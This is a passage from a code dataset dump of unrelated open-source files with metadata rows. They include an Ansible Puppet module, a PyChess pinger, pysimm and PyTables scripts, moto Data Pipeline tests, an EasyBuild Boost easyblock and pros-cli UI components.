stat.S_IRUSR | stat.S_IWUSR), 'w')
out_file.write(json.dumps(data).encode('utf8'))
out_file.close()
def main():
module = AnsibleModule(
argument_spec=dict(
timeout=dict(default="30m"),
puppetmaster=dict(required=False, default=None),
modulepath=dict(required=False, default=None),
manifest=dict(required=False, default=None),
logdest=dict(
required=False, default='stdout',
choices=['stdout', 'syslog']),
show_diff=dict(
# internal code to work with --diff, do not use
default=False, aliases=['show-diff'], type='bool'),
facts=dict(default=None, type='dict'),
facter_basename=dict(default='ansible'),
environment=dict(required=False, default=None),
certname=dict(required=False, default=None),
tags=dict(required=False, default=None, type='list'),
execute=dict(required=False, default=None),
),
supports_check_mode=True,
mutually_exclusive=[
('puppetmaster', 'manifest'),
('puppetmaster', 'manifest', 'execute'),
('puppetmaster', 'modulepath')
],
)
p = module.params
global PUPPET_CMD
PUPPET_CMD = module.get_bin_path("puppet", False, ['/opt/puppetlabs/bin'])
if not PUPPET_CMD:
module.fail_json(
msg="Could not find puppet. Please ensure it is installed.")
global TIMEOUT_CMD
TIMEOUT_CMD = module.get_bin_path("timeout", False)
if p['manifest']:
if not os.path.exists(p['manifest']):
module.fail_json(
msg="Manifest file %(manifest)s not found." % dict(
manifest=p['manifest']))
# Check if puppet is disabled here
if not p['manifest']:
rc, stdout, stderr = module.run_command(
PUPPET_CMD + " config print agent_disabled_lockfile")
if os.path.exists(stdout.strip()):
module.fail_json(
msg="Puppet agent is administratively disabled.",
disabled=True)
elif rc != 0:
module.fail_json(
msg="Puppet agent state could not be determined.")
if module.params['facts'] and not module.check_mode:
_write_structured_data(
_get_facter_dir(),
module.params['facter_basename'],
module.params['facts'])
if TIMEOUT_CMD:
base_cmd = "%(timeout_cmd)s -s 9 %(timeout)s %(puppet_cmd)s" % dict(
timeout_cmd=TIMEOUT_CMD,
timeout=pipes.quote(p['timeout']),
puppet_cmd=PUPPET_CMD)
else:
base_cmd = PUPPET_CMD
if not p['manifest'] and not p['execute']:
cmd = ("%(base_cmd)s agent --onetime"
" --ignorecache --no-daemonize --no-usecacheonfailure --no-splay"
" --detailed-exitcodes --verbose --color 0") % dict(
base_cmd=base_cmd,
)
if p['puppetmaster']:
cmd += " --server %s" % pipes.quote(p['puppetmaster'])
if p['show_diff']:
cmd += " --show_diff"
if p['environment']:
cmd += " --environment '%s'" % p['environment']
if p['tags']:
cmd += " --tags '%s'" % ','.join(p['tags'])
if p['certname']:
cmd += " --certname='%s'" % p['certname']
if module.check_mode:
cmd += " --noop"
else:
cmd += " --no-noop"
else:
cmd = "%s apply --detailed-exitcodes " % base_cmd
if p['logdest'] == 'syslog':
cmd += "--logdest syslog "
if p['modulepath']:
cmd += "--modulepath='%s'" % p['modulepath']
if p['environment']:
cmd += "--environment '%s' " % p['environment']
if p['certname']:
cmd += " --certname='%s'" % p['certname']
if p['tags']:
cmd += " --tags '%s'" % ','.join(p['tags'])
if module.check_mode:
cmd += "--noop "
else:
cmd += "--no-noop "
if p['execute']:
cmd += " --execute '%s'" % p['execute']
else:
cmd += pipes.quote(p['manifest'])
rc, stdout, stderr = module.run_command(cmd)
if rc == 0:
# success
module.exit_json(rc=rc, changed=False, stdout=stdout, stderr=stderr)
elif rc == 1:
# rc==1 could be because it's disabled
# rc==1 could also mean there was a compilation failure
disabled = "administratively disabled" in stdout
if disabled:
msg = "puppet is disabled"
else:
msg = "puppet did not run"
module.exit_json(
rc=rc, disabled=disabled, msg=msg,
error=True, stdout=stdout, stderr=stderr)
elif rc == 2:
# success with changes
module.exit_json(rc=0, changed=True, stdout=stdout, stderr=stderr)
elif rc == 124:
# timeout
module.exit_json(
rc=rc, msg="%s timed out" % cmd, stdout=stdout, stderr=stderr)
else:
# failure
module.fail_json(
rc=rc, msg="%s failed with return code: %d" % (cmd, rc),
stdout=stdout, stderr=stderr)
if __name__ == '__main__':
main()
| bsd-3-clause | 3,229,730,367,233,816,600 | 29.61324 | 92 | 0.57751 | false |
pychess/pychess | lib/pychess/System/ping.py | 1 | 2987 | # -*- coding: UTF-8 -*-
import re
import sys
import shutil
from gi.repository import GObject
from pychess.compat import create_task
from pychess.System.Log import log
from pychess.System.SubProcess import SubProcess
class Pinger(GObject.GObject):
""" The received signal contains the time it took to get response from the
server in millisecconds. -1 means that some error occurred """
__gsignals__ = {
"received": (GObject.SignalFlags.RUN_FIRST, None, (float, )),
"error": (GObject.SignalFlags.RUN_FIRST, None, (str, ))
}
def __init__(self, host):
GObject.GObject.__init__(self)
self.host = host
self.subproc = None
self.expression = re.compile(r"=([\d\.]+) (m?s)")
# We need untranslated error messages in regexp search
# below, so have to use deferred translation here
def _(msg):
return msg
error = _("Destination Host Unreachable")
self.errorExprs = (re.compile("(%s)" % error), )
del _
self.restartsOnDead = 3
self.deadCount = 0
def start(self):
assert not self.subproc
if sys.platform == "win32":
args = ["-t", self.host]
else:
args = ["-i10", self.host]
self.subproc = SubProcess(shutil.which("ping"), args, env={"LANG": "en"})
create_task(self.subproc.start())
self.conid1 = self.subproc.connect("line", self.__handleLines)
self.conid2 = self.subproc.connect("died", self.__handleDead)
def __handleLines(self, subprocess, line):
match = self.expression.search(line)
if match:
time, unit = match.groups()
time = float(time)
if unit == "s":
time *= 1000
self.emit("received", time)
else:
for expr in self.errorExprs:
match = expr.search(line)
if match:
msg = match.groups()[0]
self.emit("error", _(msg))
def __handleDead(self, subprocess):
if self.deadCount < self.restartsOnDead:
log.warning("Pinger died and restarted (%d/%d)" %
(self.deadCount + 1, self.restartsOnDead),
extra={"task": self.subproc.defname})
self.stop()
self.start()
self.deadCount += 1
else:
self.emit("error", _("Died"))
self.stop()
def stop(self):
if not self.subproc:
return
# exitCode = self.subproc.gentleKill()
self.subproc.disconnect(self.conid1)
self.subproc.disconnect(self.conid2)
self.subproc.terminate()
self.subproc = None
if __name__ == "__main__":
pinger = Pinger("google.com")
def callback(pinger, time):
print(time)
pinger.connect("received", callback)
pinger.start()
import time
time.sleep(5)
pinger.stop()
time.sleep(3)
| gpl-3.0 | -185,132,185,501,466,400 | 28.574257 | 81 | 0.556076 | false |
polysimtools/pysimm | Examples/04_polyethylene/gaff2/create.py | 3 | 2276 | from pysimm import system, lmps, forcefield
from pysimm.apps.random_walk import random_walk
from pysimm.models.monomers.gaff2.pe import monomer
def run(test=False):
# we'll create a pe monomer from the pysimm.models database
pe = monomer()
# we'll instantiate a GAFF2 forcefield object for use later
f = forcefield.Gaff2()
# the monomers do not have any charges, so we will derive partial charges using the gasteiger algorithm
pe.apply_charges(f, charges='gasteiger')
# run the random_walk polymerization method making a chain of 10 repeat units
# the forcefield object is supplied to get new forcefield types not in the monomer system
polymer = random_walk(pe, 10, forcefield=f)
# write a few different file formats
polymer.write_xyz('polymer.xyz')
polymer.write_yaml('polymer.yaml')
polymer.write_lammps('polymer.lmps')
polymer.write_chemdoodle_json('polymer.json')
# if you want to restart a polymerization, the yaml file format retains linker information
# random_walk looks for the last head and tail linkers, so just run a copolymerization with the original polymer chain and new monomers
# we give the copolymer function a list of reference "monomers", but use the first polymer chain as the first "monomer" and only insert one
# then we use the pattern argument to define how many of each "monomers" to add. Let's add 5 more monomers to our chain
# first import the copolymer function
from pysimm.apps.random_walk import copolymer
# now read in the yaml file we saved after making our first polymer
original_polymer = system.read_yaml('polymer.yaml')
# we can use our original polyethylene monomer because it doesn't get modified during polymerization
# the total number of monomers we're adding is 6, 1 for the original polymer chain, and 5 for our new monomers
longer_polymer = copolymer([original_polymer, pe], 6, pattern=[1, 5], forcefield=f)
longer_polymer.write_xyz('longer_polymer.xyz')
longer_polymer.write_yaml('longer_polymer.yaml')
longer_polymer.write_lammps('longer_polymer.lmps')
longer_polymer.write_chemdoodle_json('longer_polymer.json')
if __name__ == '__main__':
run() | mit | 6,607,197,273,273,481,000 | 45.469388 | 143 | 0.720562 | false |
jakirkham/dask-distance | setup.py | 1 | 1828 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import setuptools
from setuptools import setup
from setuptools.command.test import test as TestCommand
import versioneer
class PyTest(TestCommand):
description = "Run test suite with pytest"
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
sys.exit(pytest.main(self.test_args))
with open("README.rst") as readme_file:
readme = readme_file.read()
requirements = [
"dask",
"numpy",
]
test_requirements = [
"pytest",
"scipy",
]
cmdclasses = {
"test": PyTest,
}
cmdclasses.update(versioneer.get_cmdclass())
setup(
name="dask-distance",
version=versioneer.get_version(),
description=(
"Distance computations with Dask (akin to scipy.spatial.distance)"
),
long_description=readme,
author="John Kirkham",
author_email="[email protected]",
url="https://github.com/jakirkham/dask-distance",
cmdclass=cmdclasses,
packages=setuptools.find_packages(exclude=["tests*"]),
include_package_data=True,
install_requires=requirements,
license="BSD 3-Clause",
zip_safe=False,
keywords="dask-distance",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Natural Language :: English",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
],
tests_require=test_requirements
)
| bsd-3-clause | -8,600,454,990,359,348,000 | 23.702703 | 74 | 0.637856 | false |
rdhyee/PyTables | tables/tests/create_backcompat_indexes.py | 6 | 1209 | # -*- coding: utf-8 -*-
# Script for creating different kind of indexes in a small space as possible.
# This is intended for testing purposes.
import tables
class Descr(tables.IsDescription):
var1 = tables.StringCol(itemsize=4, shape=(), dflt='', pos=0)
var2 = tables.BoolCol(shape=(), dflt=False, pos=1)
var3 = tables.Int32Col(shape=(), dflt=0, pos=2)
var4 = tables.Float64Col(shape=(), dflt=0.0, pos=3)
# Parameters for the table and index creation
small_chunkshape = (2,)
small_blocksizes = (64, 32, 16, 8)
nrows = 43
# Create the new file
h5fname = 'indexes_2_1.h5'
h5file = tables.open_file(h5fname, 'w')
t1 = h5file.create_table(h5file.root, 'table1', Descr)
row = t1.row
for i in range(nrows):
row['var1'] = i
row['var2'] = i
row['var3'] = i
row['var4'] = i
row.append()
t1.flush()
# Do a copy of table1
t1.copy(h5file.root, 'table2')
# Create indexes of all kinds
t1.cols.var1.create_index(0, 'ultralight', _blocksizes=small_blocksizes)
t1.cols.var2.create_index(3, 'light', _blocksizes=small_blocksizes)
t1.cols.var3.create_index(6, 'medium', _blocksizes=small_blocksizes)
t1.cols.var4.create_index(9, 'full', _blocksizes=small_blocksizes)
h5file.close()
| bsd-3-clause | -919,956,977,047,702,900 | 27.785714 | 77 | 0.684864 | false |
alephdata/aleph | aleph/index/notifications.py | 1 | 1783 | import logging
from pprint import pprint # noqa
from banal import hash_data
from datetime import datetime
from followthemoney.util import get_entity_id
from aleph.index.util import index_name, index_settings, configure_index
from aleph.index.util import query_delete, index_safe
from aleph.index.util import KEYWORD
log = logging.getLogger(__name__)
def notifications_index():
return index_name("notifications", "v1")
def configure_notifications():
mapping = {
"date_detection": False,
"dynamic": False,
"properties": {
"event": KEYWORD,
"actor_id": KEYWORD,
"channels": KEYWORD,
"created_at": {"type": "date"},
"params": {"dynamic": True, "type": "object"},
},
}
index = notifications_index()
settings = index_settings(shards=3)
return configure_index(index, mapping, settings)
def index_notification(event, actor_id, params, channels, sync=False):
"""Index a notification."""
params = params or {}
data = {}
for param, value in params.items():
value = get_entity_id(value)
if value is not None:
data[param] = str(value)
channels = list(set([c for c in channels if c is not None]))
data = {
"actor_id": actor_id,
"params": data,
"event": event.name,
"channels": channels,
"created_at": datetime.utcnow(),
}
index = notifications_index()
id_ = hash_data((actor_id, event.name, channels, params))
return index_safe(index, id_, data, sync=sync)
def delete_notifications(filter_, sync=False):
"""Delete notifications from a specific channel."""
query = {"bool": {"filter": [filter_]}}
query_delete(notifications_index(), query, sync=sync)
| mit | -4,261,842,075,724,906,500 | 29.220339 | 72 | 0.62479 | false |
Brett55/moto | tests/test_datapipeline/test_datapipeline.py | 9 | 6076 | from __future__ import unicode_literals
import boto.datapipeline
import sure # noqa
from moto import mock_datapipeline_deprecated
from moto.datapipeline.utils import remove_capitalization_of_dict_keys
def get_value_from_fields(key, fields):
for field in fields:
if field['key'] == key:
return field['stringValue']
@mock_datapipeline_deprecated
def test_create_pipeline():
conn = boto.datapipeline.connect_to_region("us-west-2")
res = conn.create_pipeline("mypipeline", "some-unique-id")
pipeline_id = res["pipelineId"]
pipeline_descriptions = conn.describe_pipelines(
[pipeline_id])["pipelineDescriptionList"]
pipeline_descriptions.should.have.length_of(1)
pipeline_description = pipeline_descriptions[0]
pipeline_description['name'].should.equal("mypipeline")
pipeline_description["pipelineId"].should.equal(pipeline_id)
fields = pipeline_description['fields']
get_value_from_fields('@pipelineState', fields).should.equal("PENDING")
get_value_from_fields('uniqueId', fields).should.equal("some-unique-id")
PIPELINE_OBJECTS = [
{
"id": "Default",
"name": "Default",
"fields": [{
"key": "workerGroup",
"stringValue": "workerGroup"
}]
},
{
"id": "Schedule",
"name": "Schedule",
"fields": [{
"key": "startDateTime",
"stringValue": "2012-12-12T00:00:00"
}, {
"key": "type",
"stringValue": "Schedule"
}, {
"key": "period",
"stringValue": "1 hour"
}, {
"key": "endDateTime",
"stringValue": "2012-12-21T18:00:00"
}]
},
{
"id": "SayHello",
"name": "SayHello",
"fields": [{
"key": "type",
"stringValue": "ShellCommandActivity"
}, {
"key": "command",
"stringValue": "echo hello"
}, {
"key": "parent",
"refValue": "Default"
}, {
"key": "schedule",
"refValue": "Schedule"
}]
}
]
@mock_datapipeline_deprecated
def test_creating_pipeline_definition():
conn = boto.datapipeline.connect_to_region("us-west-2")
res = conn.create_pipeline("mypipeline", "some-unique-id")
pipeline_id = res["pipelineId"]
conn.put_pipeline_definition(PIPELINE_OBJECTS, pipeline_id)
pipeline_definition = conn.get_pipeline_definition(pipeline_id)
pipeline_definition['pipelineObjects'].should.have.length_of(3)
default_object = pipeline_definition['pipelineObjects'][0]
default_object['name'].should.equal("Default")
default_object['id'].should.equal("Default")
default_object['fields'].should.equal([{
"key": "workerGroup",
"stringValue": "workerGroup"
}])
@mock_datapipeline_deprecated
def test_describing_pipeline_objects():
conn = boto.datapipeline.connect_to_region("us-west-2")
res = conn.create_pipeline("mypipeline", "some-unique-id")
pipeline_id = res["pipelineId"]
conn.put_pipeline_definition(PIPELINE_OBJECTS, pipeline_id)
objects = conn.describe_objects(["Schedule", "Default"], pipeline_id)[
'pipelineObjects']
objects.should.have.length_of(2)
default_object = [x for x in objects if x['id'] == 'Default'][0]
default_object['name'].should.equal("Default")
default_object['fields'].should.equal([{
"key": "workerGroup",
"stringValue": "workerGroup"
}])
@mock_datapipeline_deprecated
def test_activate_pipeline():
conn = boto.datapipeline.connect_to_region("us-west-2")
res = conn.create_pipeline("mypipeline", "some-unique-id")
pipeline_id = res["pipelineId"]
conn.activate_pipeline(pipeline_id)
pipeline_descriptions = conn.describe_pipelines(
[pipeline_id])["pipelineDescriptionList"]
pipeline_descriptions.should.have.length_of(1)
pipeline_description = pipeline_descriptions[0]
fields = pipeline_description['fields']
get_value_from_fields('@pipelineState', fields).should.equal("SCHEDULED")
@mock_datapipeline_deprecated
def test_delete_pipeline():
conn = boto.datapipeline.connect_to_region("us-west-2")
res = conn.create_pipeline("mypipeline", "some-unique-id")
pipeline_id = res["pipelineId"]
conn.delete_pipeline(pipeline_id)
response = conn.list_pipelines()
response["pipelineIdList"].should.have.length_of(0)
@mock_datapipeline_deprecated
def test_listing_pipelines():
conn = boto.datapipeline.connect_to_region("us-west-2")
res1 = conn.create_pipeline("mypipeline1", "some-unique-id1")
res2 = conn.create_pipeline("mypipeline2", "some-unique-id2")
response = conn.list_pipelines()
response["hasMoreResults"].should.be(False)
response["marker"].should.be.none
response["pipelineIdList"].should.have.length_of(2)
response["pipelineIdList"].should.contain({
"id": res1["pipelineId"],
"name": "mypipeline1",
})
response["pipelineIdList"].should.contain({
"id": res2["pipelineId"],
"name": "mypipeline2"
})
@mock_datapipeline_deprecated
def test_listing_paginated_pipelines():
conn = boto.datapipeline.connect_to_region("us-west-2")
for i in range(100):
conn.create_pipeline("mypipeline%d" % i, "some-unique-id%d" % i)
response = conn.list_pipelines()
response["hasMoreResults"].should.be(True)
response["marker"].should.equal(response["pipelineIdList"][-1]['id'])
response["pipelineIdList"].should.have.length_of(50)
# testing a helper function
def test_remove_capitalization_of_dict_keys():
result = remove_capitalization_of_dict_keys(
{
"Id": "IdValue",
"Fields": [{
"Key": "KeyValue",
"StringValue": "StringValueValue"
}]
}
)
result.should.equal({
"id": "IdValue",
"fields": [{
"key": "KeyValue",
"stringValue": "StringValueValue"
}],
})
| apache-2.0 | -3,070,338,029,501,897,000 | 28.784314 | 77 | 0.621297 | false |
JensTimmerman/easybuild-easyblocks | easybuild/easyblocks/b/boost.py | 1 | 6055 | ##
# Copyright 2009-2012 Ghent University
# Copyright 2009-2012 Stijn De Weirdt
# Copyright 2010 Dries Verdegem
# Copyright 2010-2012 Kenneth Hoste
# Copyright 2011 Pieter De Baets
# Copyright 2011-2012 Jens Timmerman
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for Boost, implemented as an easyblock
"""
import os
import shutil
import easybuild.tools.toolchain as toolchain
from easybuild.framework.easyblock import EasyBlock
from easybuild.framework.easyconfig import CUSTOM
from easybuild.tools.filetools import run_cmd
from easybuild.tools.modules import get_software_root
class EB_Boost(EasyBlock):
"""Support for building Boost."""
def __init__(self, *args, **kwargs):
"""Initialize Boost-specific variables."""
super(EB_Boost, self).__init__(*args, **kwargs)
self.objdir = None
@staticmethod
def extra_options():
"""Add extra easyconfig parameters for Boost."""
extra_vars = [('boost_mpi', [False, "Build mpi boost module (default: False)", CUSTOM])]
return EasyBlock.extra_options(extra_vars)
def configure_step(self):
"""Configure Boost build using custom tools"""
# mpi sanity check
if self.cfg['boost_mpi'] and not self.toolchain.options['usempi']:
self.log.error("When enabling building boost_mpi, also enable the 'usempi' toolchain option.")
# create build directory (Boost doesn't like being built in source dir)
try:
self.objdir = os.path.join(self.builddir, 'obj')
os.mkdir(self.objdir)
self.log.debug("Succesfully created directory %s" % self.objdir)
except OSError, err:
self.log.error("Failed to create directory %s: %s" % (self.objdir, err))
# generate config depending on compiler used
toolset = None
if self.toolchain.comp_family() == toolchain.INTELCOMP:
toolset = 'intel-linux'
elif self.toolchain.comp_family() == toolchain.GCC:
toolset = 'gcc'
else:
self.log.error("Unknown compiler used, aborting.")
cmd = "./bootstrap.sh --with-toolset=%s --prefix=%s" % (toolset, self.objdir)
run_cmd(cmd, log_all=True, simple=True)
if self.cfg['boost_mpi']:
self.toolchain.options['usempi'] = True
# configure the boost mpi module
# http://www.boost.org/doc/libs/1_47_0/doc/html/mpi/getting_started.html
# let Boost.Build know to look here for the config file
f = open('user-config.jam', 'a')
f.write("using mpi : %s ;" % os.getenv("MPICXX"))
f.close()
def build_step(self):
"""Build Boost with bjam tool."""
bjamoptions = " --prefix=%s" % self.objdir
# specify path for bzip2/zlib if module is loaded
for lib in ["bzip2", "zlib"]:
libroot = get_software_root(lib)
if libroot:
bjamoptions += " -s%s_INCLUDE=%s/include" % (lib.upper(), libroot)
bjamoptions += " -s%s_LIBPATH=%s/lib" % (lib.upper(), libroot)
if self.cfg['boost_mpi']:
self.log.info("Building boost_mpi library")
bjammpioptions = "%s --user-config=user-config.jam --with-mpi" % bjamoptions
# build mpi lib first
# let bjam know about the user-config.jam file we created in the configure step
run_cmd("./bjam %s" % bjammpioptions, log_all=True, simple=True)
# boost.mpi was built, let's 'install' it now
run_cmd("./bjam %s install" % bjammpioptions, log_all=True, simple=True)
# install remainder of boost libraries
self.log.info("Installing boost libraries")
cmd = "./bjam %s install" % bjamoptions
run_cmd(cmd, log_all=True, simple=True)
def install_step(self):
"""Install Boost by copying file to install dir."""
self.log.info("Copying %s to installation dir %s" % (self.objdir, self.installdir))
try:
for f in os.listdir(self.objdir):
src = os.path.join(self.objdir, f)
dst = os.path.join(self.installdir, f)
if os.path.isdir(src):
shutil.copytree(src, dst)
else:
shutil.copy2(src, dst)
except OSError, err:
self.log.error("Copying %s to installation dir %s failed: %s" % (self.objdir,
self.installdir,
err))
def sanity_check_step(self):
"""Custom sanity check for Boost."""
mpifs = []
if self.cfg['boost_mpi']:
mpifs = ['lib/libboost_mpi.so']
custom_paths = {
'files': mpifs + ['lib/libboost_%s.so' % x for x in ['python', 'system']],
'dirs':['include/boost']
}
super(EB_Boost, self).sanity_check_step(custom_paths=custom_paths)
| gpl-2.0 | -2,797,290,798,981,957,600 | 37.814103 | 106 | 0.606441 | false |
purduesigbots/pros-cli | pros/common/ui/interactive/components/component.py | 1 | 2612 | from typing import *
from pros.common.ui.interactive.parameters.parameter import Parameter
from pros.common.ui.interactive.parameters.validatable_parameter import ValidatableParameter
class Component(object):
"""
A Component is the basic building block of something to render to users.
Components must convey type. For backwards compatibility, Components will advertise their class hierarchy to
the renderer so that it may try to render something reasonable if the renderer hasn't implemented a handler
for the specific component class.
For instance, DropDownComponent is a subclass of BasicParameterComponent, ParameterizedComponent, and finally
Component. If a renderer has not implemented DropDownComponent, then it can render its version of a
BasicParameterComponent (or ParameterizedComponent). Although a dropdown isn't rendered to the user, something
reasonable can still be displayed.
"""
@classmethod
def get_hierarchy(cls, base: type) -> Optional[List[str]]:
if base == cls:
return [base.__name__]
for t in base.__bases__:
lst = cls.get_hierarchy(t)
if lst:
lst.insert(0, base.__name__)
return lst
return None
def __getstate__(self) -> Dict:
return dict(
etype=Component.get_hierarchy(self.__class__)
)
P = TypeVar('P', bound=Parameter)
class ParameterizedComponent(Component, Generic[P]):
"""
A ParameterizedComponent has a parameter which takes a value
"""
def __init__(self, parameter: P):
self.parameter = parameter
def __getstate__(self):
extra_state = {}
if isinstance(self.parameter, ValidatableParameter):
extra_state['valid'] = self.parameter.is_valid()
reason = self.parameter.is_valid_reason()
if reason:
extra_state['valid_reason'] = self.parameter.is_valid_reason()
return dict(
**super(ParameterizedComponent, self).__getstate__(),
**extra_state,
value=self.parameter.value,
uuid=self.parameter.uuid,
)
class BasicParameterizedComponent(ParameterizedComponent[P], Generic[P]):
"""
A BasicParameterComponent is a ParameterizedComponent with a label.
"""
def __init__(self, label: AnyStr, parameter: P):
super().__init__(parameter)
self.label = label
def __getstate__(self):
return dict(
**super(BasicParameterizedComponent, self).__getstate__(),
text=self.label,
)
| mpl-2.0 | -1,232,497,420,040,287,700 | 33.368421 | 114 | 0.647014 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.